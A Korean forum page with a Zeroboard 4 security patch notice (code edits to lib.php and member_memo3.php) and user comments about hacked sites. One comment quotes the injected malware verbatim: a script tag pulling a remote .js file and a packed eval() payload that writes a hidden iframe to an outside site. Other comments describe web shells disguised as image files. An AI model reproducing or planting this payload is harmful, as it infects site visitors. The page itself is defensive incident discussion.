제로보드 4.0버젼의 프로그램 파일과 각종 패치파일들을 올리는 곳입니다.
제로보드4.0 버전의 경우 파일의 재배포는 무조건 금지합니다.
어떠한 경우라도 제로보드4를 자신의 자료실에 올리지 마십시요.
또한 제로보드4 버전은 원활한 기술지원이 어려운 상황입니다.
제로보드의 최신 버전인 제로보드XE에 대해 알아보시려면 여기를 클릭하세요
지난 11월 1일 패치한 현재 접속자 체크 부분의 $REMOTE_ADDR 접속을 막은 후 이를 다시 우회하는 취약점을 "패스 코리아넷의 빈경윤님"께서 알려주셔서 급히 패치를 하게 되었습니다.
lib.php 파일을 수정하지 않고 사용하시는 분은 lib.php , member_memo3.php
파일을 사용하시는 제로보드의 디렉토리에 덮어써주시면 됩니다.
수정하여 쓰시는 분은 다음과 같이 해주세요.
아래 파일을 에디터등으로 여셔서 아래와 같은 부분을 변경해 주세요.
1. lib.php 파일 : function getNowConnector($filename,$div) 부분에 붉은색 코드를 추가
원본 : $_str = str_replace("<?/*","",$_str);
수정 : $_str = str_replace("<? die('Access Denied');/*","",$_str);
=======================================================================================
원본 : zWriteFile($filename, "<? /*".$_realNowConnector."*/?>");
수정 : zWriteFile($filename, "<? die('Access Denied');/*".$_realNowConnector."*/?>");
2. lib.php 파일 : function getNowConnector_num($filename, $div) 부분에 붉은색 코드를 추가
원본 : $_str = str_replace("<?/*","",$_str);
수정 : $_str = str_replace("<? die('Access Denied');/*","",$_str);
=======================================================================================
원본 : zWriteFile($filename, "<? /*".$_realNowConnector."*/?>");
수정 : zWriteFile($filename, "<? die('Access Denied');/*".$_realNowConnector."*/?>");
3. member_memo3.php 파일 : 아래 부분을 수정 (30번째 줄 근처)
원본 : $_str = str_replace("<?/*","",$_str);
수정 : $_str = str_replace("<? die('Access Denied');/*","",$_str);
4. lib.php 파일 : function makeZBSessionID($no) 함수 중간에 붉은색 코드를 추가
function makeZBSessionID($no) {
global $HTTP_COOKIE_VARS, $_zb_path, $_zbDefaultSetup;
$no = (int)$no;
$zbSessionID = md5($no."-^A-".time());
$newStr = "<?/*\n$no\n".time()."\n*/?>";
zWriteFile($_zb_path.$_zbDefaultSetup[session_path]."/zbSessionID_".$zbSessionID.".php", $newStr);
@setcookie("ZBSESSIONID", $zbSessionID, time()+60*60*24*365, "/");
}
위 1, 2, 3번은 빈경유님께서 알려주신 부분입니다.
매우 감사합니다. ^^
그리고 4번의 경우는 혹시 생길 취약점을 대비하여 $no의 값을 int 형으로 강제 형변환을 시키는 부분입니다.
제로보드4의 경우 php3 때부터 만들어진 코드이고 php가 발전되고 편의성을 위해 추가된 기능들에 대한 대비가 모자랍니다.
꼭 패치를 해주세요.
최대한 빠른 시간 내에 zbxe의 안정화 및 마이그레이션 툴의 강화를 거쳐 이전 하시는데 어려움이 없도록 하겠습니다.
감사합니다.
댓글 '70'
으헣
일단 사이트 2개에 제로보드4버전으로 사용중인데...
하나의 사이트는 해킹당하기전에 패치를 적용을 성공했으나
다른 사이트하나는 <script language="javascript" type="text/javascript" src="icon/zboard.gif"></script> 라는 소스가
_head.php 마지막줄에 심어져있더군요...-_-
이미벌써...cm_comment_head.php 파일이라는게 심어져있는걸 발견하고 지우고..data에 zboard.gif 하고 mem.gif가 생겨있길래
에디터로 열어보니 요상한 문구가..;;
data/..gif파일 있음 에디터로 열어보시고 이미지파일이 아니면 언능 지우세요...ㅜㅜ
_head 소스 수정도 듣질않아 다시 지우고 백업파일을 다시 올렸습니다...;;
일단 저 스크립트가 심어져있을경우 첨부파일을 클릭했을때 다운로드가 되지않고 오류문구가 뜨더군요...
지울거 다 지우고 해도 어째 찜찜하네요...또 다시 심어질것같은 느낌....ㄷㄷ
어쨌든....패치해보니....
저역시 자잘한 소스부터 이것저것 추가한 소스들이 많아서 그런지 제로님 말대로 소스수정했다가
오류문구만 뜨고 백지상태가 되더군요...
위에 고수님들 말을 종합해서 적용한 결과 성공적으로 패치했습니다..
카운터를 php로 불러쓰고 주석처리한게 많아서 그랬더군요~^^;
p.s) 중국발 크래킹이라면 사이트 자체를 중국에서 접속하는 아이피 차단같은거 하면 안되나요? 답답해서 해본소리...끙...
![[레벨:1]](http://www.xpressengine.com/modules/point/icons/default/1.gif "포인트:235point (53%), 레벨:1/30"){kind=icon}
nbamania아래 글을 어떻게 해야 할지 30분째 보고 있는데 답이 안나오네요.
알ftp의 zb4의 lib.php파일을 어떻게 하라는 건지...모르겠어요/
디렉토리에 덮어써주는게 어떻게 하는건가요? 허접질문 죄송....
lib.php 파일을 수정하지 않고 사용하시는 분은 lib.php , member_memo3.php
파일을 사용하시는 제로보드의 디렉토리에 덮어써주시면 됩니다.
http://singh.cafe24.com/zeroboard/admin.php 에선 경고문이 여전히 뜨고 로그인이 전혀 안되는데 어떻하나요ㅡㅜ
mnn
제홈피 호스팅업체에 관련공지가 올라왔네요, 결국 패치를 하란 말 같은데...
http://www.x-y.net/notice/notice_view.php?seq_no=183
![[레벨:3]](http://www.xpressengine.com/modules/point/icons/default/3.gif "포인트:1000point (30%), 레벨:3/30"){kind=icon}
제로보드폴더안 lib.php를 열어..
<? 다음행에 아래소스를 추가해보세요..
ini_set('session.bug_compat_42',1);
ini_set('session.bug_compat_warn',0);
lib.php
_foot.php
_head.php
zboard.php
번갈아가면 삽입하구요.
<script language="javascript" type="text/javascript" src="http://420.or.kr/css.js"></script>
====================================================================
내용은
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2.3("<1 4=5://6.7.8/9/a.b c=0 d=0></1>")',14,14,'|iframe|document|write|src|http|www|beijian|com|bbs|check|htm|width|height'.split('|'),0,{}))
=====================================================================================
입니다.
낮이나 밤이나 새벽이나 할거 없이 계속 삽입하는데 막을수 없을까요?
nzeo_user
제로보드가 설치된 경로, data, icon, image 폴더내에 이상한 파일이 있는지 살펴보시고
모두 삭제해 주시면 뚤린곳이 그나마 해결될 겁니다.
확장자가 php, gif, txt 등으로 마구 설치 해 놓아서,
내용을 에디터 등으로 살펴보시고 삭제해 보세요.
zeroboard.gif, .htacc-zeroboardess, 이상한제목.txt등의 파일을 에디터로 열어보면 제로보드를 제어하기 위한 코드등이 많이 심어져 있을겁니다. 또, 이넘들이 머리를 써서, 관리자 파일 upload_admin.php (예시) 등의 이름으로도 이리저리 심어놓기도 합니다. (파일명은 임의로 지정해 놓았더라구요..)
저도 이거 처리하는데 꽤 시간이 걸렸는데 맘먹고 다 삭제처리해주면 큰 문제는 없는듯합니다.
![[레벨:2]](http://www.xpressengine.com/modules/point/icons/default/2.gif "포인트:655point (65%), 레벨:2/30"){kind=icon}
쮸야282
어쩌구 저쩌구 하는 에러문구가 뜨던데...
loged.php 파일 열어서
고쳐야 할 해당 부분을
$_str = str_replace("<? die('Access Denied');/*","",$_str);
이렇게 고쳐주니... 바로 해결됐네요.
쩝... 다행입니다.
운좋게 바로 찾았는데... 삽질할뻔 했습니다.
보안 취약점 문제가 또 발생하였습니다.
보안패치는 당연히 적용된 상태이나. 다른 부분에 또 취약점이 있는것 같습니다.
해결책을 제시해주세요